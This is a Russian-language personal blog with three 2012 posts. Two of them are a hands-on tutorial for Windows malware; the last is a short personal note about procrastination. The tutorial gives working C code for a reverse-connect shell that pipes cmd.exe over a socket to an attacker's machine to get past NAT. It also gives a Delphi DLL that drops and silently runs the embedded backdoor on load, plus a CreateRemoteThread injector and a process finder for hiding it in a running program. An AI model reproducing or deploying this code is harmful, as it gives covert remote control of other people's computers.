Общее·количество·просмотров·страницы

среда, 14 ноября 2012 г.

reverse connect2

хух.наконец я тут.
нашел в себе силы сегодня продолжить.

Итак как я и говорил продолжаем идею.

пишем DLL на delphi.Но сначала берем хекс редактор и копируем код в массив на делфи.

получается что то такое:


data: array[0..7167] of byte = (
$4D, $5A, $90, $00, $03, $00, $00, $00, $04, $00, $00, $00, $FF, $FF, $00, $00, 
$B8, $00, $00, $00, $00, $00, $00, $00, $40, $00, $00, $00, $00, $00, $00, $00, 
$00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, 
$00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $E0, $00, $00, $00, 
$0E, $1F, $BA, $0E, $00, $B4, $09, $CD, $21, $B8, $01, $4C, $CD, $21, $54, $68, 
$69, $73, $20, $70, $72, $6F, $67, $72, $61, $6D, $20, $63, $61, $6E, $6E, $6F
.........................................................................................................................................................

дальше идея проста:
По DLL_PROCESS_ATTACH создаем файл,записываем в него массив,закрываем и запускаем.
вот и все.

простая процедурка:


procedure DLLEntryPoint(Reason: Integer);
var nw:cardinal;
h:thandle;
begin

case Reason of

DLL_PROCESS_ATTACH:
begin

h:=createfile('kon.exe',GENERIC_READ or GENERIC_WRITE,0,nil,CREATE_ALWAYS,FILE_ATTRIBUTE_NORMAL,0);

writefile(h,data,sizeof(data),nw,nil);

closehandle(h);

shellexecute(0,'open','kon.exe',0,0,SW_HIDE);

end;

DLL_PROCESS_DETACH:;

DLL_THREAD_ATTACH: ;

DLL_THREAD_DETACH:;

end;

end;

begin

DLLProc := @DLLEntryPoint;

DLLEntryPoint(DLL_PROCESS_ATTACH); 

end.

теперь делаем инжектор в процесс.я не парился и взял Ms-rem'a


Function InjectDll(Process: dword; ModulePath: PChar): boolean;
var
  Memory:pointer;
  Code: dword;
  BytesWritten: dword;
  ThreadId: dword;
  hThread: dword;
  hKernel32: dword;
  Inject: packed record
           PushCommand:byte;
           PushArgument:DWORD;
           CallCommand:WORD;
           CallAddr:DWORD;
           PushExitThread:byte;
           ExitThreadArg:dword;
           CallExitThread:word;
           CallExitThreadAddr:DWord;
           AddrLoadLibrary:pointer;
           AddrExitThread:pointer;
           LibraryName:array[0..MAX_PATH] of char;
          end;
begin
  Result := false;
  Memory := VirtualAllocEx(Process, nil, sizeof(Inject),
                           MEM_COMMIT, PAGE_EXECUTE_READWRITE);
  if Memory = nil then Exit;

  Code := dword(Memory);
  //инициализация внедряемого кода:
  Inject.PushCommand    := $68;
  inject.PushArgument   := code + $1E;
  inject.CallCommand    := $15FF;
  inject.CallAddr       := code + $16;
  inject.PushExitThread := $68;
  inject.ExitThreadArg  := 0;
  inject.CallExitThread := $15FF;
  inject.CallExitThreadAddr := code + $1A;
  hKernel32 := GetModuleHandle('kernel32.dll');
  inject.AddrLoadLibrary := GetProcAddress(hKernel32, 'LoadLibraryA');
  inject.AddrExitThread  := GetProcAddress(hKernel32, 'ExitThread');
  lstrcpy(@inject.LibraryName, ModulePath);
  //записать машинный код по зарезервированному адресу
  WriteProcessMemory(Process, Memory, @inject, sizeof(inject), BytesWritten);
  //выполнить машинный код
  hThread := CreateRemoteThread(Process, nil, 0, Memory, nil, 0, ThreadId);
  if hThread = 0 then Exit;
  CloseHandle(hThread);
  Result := True;
end;

(копипаста с васма)
там хорошо объясняется что собсно делает код.
А именно-после загрузки dll в память будет выполнена ее точка входа- то есть наше DLL_PROCESS_ATTACH. останется только найти процесс для внедрения по запуску которого мы будем получать терминал у себя на машине с помощью такой вот функи

function GetPID(ExeFileName: string): dword;
var
  ContinueLoop: boolean;
  FSnapshotHandle: THandle;
  FProcessEntry32: TProcessEntry32;
  UpEFN: string;
begin
  result:= 0;
  UpEFN:= UpperCase(ExeFileName);
  FSnapshotHandle := CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
  FProcessEntry32.dwSize := Sizeof(FProcessEntry32);
  ContinueLoop := Process32First(FSnapshotHandle, FProcessEntry32);

  while integer(ContinueLoop) <> 0 do
  begin
    if ((UpperCase(ExtractFileName(FProcessEntry32.szExeFile)) = UpEFN)
        or (UpperCase(FProcessEntry32.szExeFile) = UpEFN)) then
    begin
      result := FProcessEntry32.th32ProcessID;
      break;
    end;
    ContinueLoop := Process32Next(FSnapshotHandle, FProcessEntry32);
  end;
  CloseHandle(FSnapshotHandle);
end;

фух ну вроде все:)
такая вот прикольная штука получается;).


поэтапный алгоритм того что мы делали:
1)написали шелл(бэкдор)
2)скопировали его в хекс-коде в массив на делфи
3)написали библиотеку которая по загрузке в память выполняет свою точку входа
4)взяли инжектор,который смотрит запустился ли процесс(надо добавить) и если да то внедряет в него dll-ку которая выполняет наш бэкдор в итоге мы получаем терминал когда какое то действие произведено(то есть когда нам это конкретно надо)

вот такие вот извращения господа:)
всем доброй ночи.

понедельник, 12 ноября 2012 г.

reverse connect


Как обещал.сегодня я сказал себе:
стоп.хватит.хватит про*бывать время в п*зду.вставай.садись за комп.делай что то пид*рас.
наверное еще помогло сесть то что сегодня была только одна пара =Р
короче соль:я не помню где я узнал эту идею:мб спизд*л у кого,может само пришло в голову.
ну смысл вот в чем:
пишем шелл(бэкдор если угодно) который будет сам устанавливать соединение с машиной атакующего (реверс коннект).В чем соль спросите вы?-обход NAT за которым могу сидеть юзверы.
Пишем на сокетах.В виду того что я прочел  книженцию по "С", то теперь хочу потренироваться немного,так что код на си.за возможную криворукость в коде не бейте:)
Но это не вся идея.Я хочу сделать так: инжект ДЛЛ в процесс и тогда открытие терминала у "нас".
сегодня я напишу шелл, завтра докидаю длл.
Поехали.


#include <winsock2.h>
#include <stdio.h>

все что понадобится.

#pragma comment(lib, "Ws2_32.lib")

говорим компилю что нужна эта библиотека.


        SOCKET sock;
WSADATA wsa;
  
STARTUPINFO s_info; 
PROCESS_INFORMATION p_info;

         struct sockaddr_in sock_struct;


int   port=6667;
    char *ip="127.0.0.1";

переменные.дальше объясню что как.

сокеты это программный интерфейс, обеспечивающий обмен данными.

бывают клиентские и серверные.каждый процесс может создать серверный сокет и забиндить его к порту (как видно в переменных порт и айпи).

если допилить нормально этот бэк,то в айпи следует использовать "белый" для 100% коннекта в вашей машине.

Первым шагом идет проверка, присутствуют ли сокеты на машине.

есть пара версий сокетов, я использую 1.1

инициализация производится с помощью команды WSAStartup

WSAStartup(0x101, &wsa);

используется 2 аргумента- версия и указатель на структуру.

если все прошло гладко(я обойдусь без проверок,все таки я ленив ;)) то мы можем попробовать открыть сокет. ф-я WSASocket

sock=WSASocket(AF_INET, SOCK_STREAM, IPPROTO_TCP,NULL,  NULL,  NULL);

у нее 3 действенных аргумента:семейство,тип и протокол.

протокол ясен пень transmission. Сокет бывает двух типов STREAM или DATAGRAM. Первый тип ориентирован на соединение,второй-отсылка пакетов.
нам подходит первое.В версии 1.1 доступно только одно семейство ;)

Остается последнее дело-установка соединения.Для этого нужно заполнить структуру SOCKADDR и создать процесс перенаправив потоки ввода-вывода в сокет,затем просто висеть.

            sock_struct.sin_port=htons(port);
            sock_struct.sin_family=AF_INET;
            sock_struct.sin_addr.s_addr=inet_addr(ip);

объясню:заполнить семейство-просто.а вот с ипом и портом чуть по иному.
порт это число,которое должно быть в сетевом порядке байт.преобразуем с помощью htons.
(подробнее в вики,там дохрена инфы).
в случае с ипом-нам нужен адрес,а адрес обычно в форме имя_домен.по этому опять нужно преобразовать.в сях есть ф-я которая быстро это сделает.

Все,производим коннект

connect(sock,(SOCKADDR*)&sock_struct,sizeof(sock_struct));

если прошло-надо заполнить структуру startupinfo (используется в связке с createprocess) что бы определить терминал.


        memset(&s_info,0,sizeof(s_info));
        s_info.cb=sizeof(s_info);
        s_info.dwFlags=STARTF_USESTDHANDLES;
        
        
        s_info.hStdInput = (HANDLE)sock;
s_info.hStdOutput= (HANDLE)sock;
s_info.hStdError = (HANDLE)sock;

устанавливаем размер структуры равный размеру структуры (ХАХА)
устанавливаем стандартный ввод-вывод-обработку ошибок данных.(важно что бы при таком заполнении параметр createprocess -fInheritHandles был TRUE).
и перенаправляем потоки ввода-вывода в сокет.

создаем процесс и зависаем


CreateProcess(NULL,"cmd.exe",NULL,NULL,TRUE,0,NULL,NULL,&s_info,&p_info);
WaitForSingleObject(p_info.hProcess,INFINITE);

Вот и все.Для проверки можно использовать нэткат:


ПОСТ СКРИПТУМ:

надеюсь завтра я не о*уею и доделаю идею до конца,потому что идея реально прикольная.

ПОСТ ПОСТ СКРИПТУМ:

ЗАЧЕМ УСЛОЖНЯТЬ ЖИЗНЬ?

скучаешь по кому-то? ---- ПИШИ КОД
хочешь встретиться? ---- ПИШИ КОД
тебя не понимают? ---- КОМПИЛЯТОР ТЕБЯ ПОЙМЕТ
есть вопросы? ---- ГУГЛ ТЕБЕ ОТВЕТИТ
не нравится что-то? ---- ТЫ-ДЕСТРУКТОР
нравится что-то? ---- ТЫ-КОНСТРУКТОР
хочется чего-то? ---- ПИШИ КОД
ЛЮБИШЬ кого-то? ---- #include <brain.h>







четверг, 8 ноября 2012 г.

лень

Короче я стал совсем ленивой свиньей.
когда я соберусь,доделаю заказы которые висят и т.д. и т.п. думаю сделаем так:
попробуем улучшить досовый двиг (натянуть текстурки на него).
Потом начнем небольшой курсик по OpenGL и двигло на opengl.
Потом (возможно) я буду доделывать (делать) ОС.
когда все это начнется не знаю,нет ни желания что то делать,ни в принципе моральных сил каких то.хочется спать,и просто валяться смотреть в потолок,думать.
обыденность заела,надо как то развеяться,а это у меня еще не скоро будет...


всем споки)